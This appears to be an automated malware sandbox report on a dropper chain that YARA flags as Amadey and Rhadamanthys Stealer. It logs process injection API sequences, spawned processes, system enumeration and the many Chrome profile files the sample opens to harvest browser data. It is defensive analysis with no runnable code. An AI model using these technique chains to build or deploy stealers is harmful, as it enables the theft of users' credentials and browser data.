Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1AC7F190000 protect: page read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_00868070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

1_2_00868070

Maps a DLL or memory area into another process

Source: C:\Windows\System32\svchost.exe	Section loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write
Source: C:\Windows\System32\svchost.exe	Section loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write

Queues an APC in another process (thread injection)

Source: C:\Windows\System32\svchost.exe

Thread APC queued: target process: C:\Program Files\Google\Chrome\Application\chrome.exe

Writes to foreign memory regions

Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1CCED230000
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory written: C:\Windows\System32\dllhost.exe base: 7FF7C3FA14E0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1E7BC3B0000
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory written: C:\Windows\System32\dllhost.exe base: 7FF7C3FA14E0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1AC7F190000
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory written: C:\Windows\System32\dllhost.exe base: 7FF7C3FA14E0

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Process created: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe "C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_6D0D120D cpuid

1_2_6D0D120D

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: EnumSystemLocalesW,	1_2_008A20C8
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: EnumSystemLocalesW,	1_2_008A21AE
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: EnumSystemLocalesW,	1_2_008981BC
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: EnumSystemLocalesW,	1_2_008A2113
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_008A2239
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: GetLocaleInfoW,	1_2_008A248C
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_008A25B2
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: GetLocaleInfoW,	1_2_008A26B8
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: GetLocaleInfoW,	1_2_008986DE
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_008A2787
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_008A1E26
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_008920C8
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_008921AE
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_008881BC
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_00892113
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00892239
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_0089248C
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_008925B2
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_008926B8
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_008886DE
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00892787
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_00891E26

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Queries volume information: C:\Users\user\Desktop\9ua5N7dcBZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3140a3c17c VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3140a3c17c\g2m.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3140a3c17c VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3140a3c17c\g2m.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_6D0D0C8E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_6D0D0C8E

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_008661F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,ReleaseDC,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,

1_2_008661F0

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_0089E68E _free,_free,_free,GetTimeZoneInformation,_free,

1_2_0089E68E

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_008693D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

1_2_008693D0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OllyDbg.exe

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1337387852.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000014.00000003.1697994530.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1612057695.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1621277287.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1460759319.0000000003040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1452899533.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1525068541.00000000030E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1760142384.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1460774355.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1682405399.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1693948772.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1697999460.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1621486479.0000000002940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons Maskable
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons Monochrome
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\affceca8-5877-40b6-92a1-68308b316b66
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
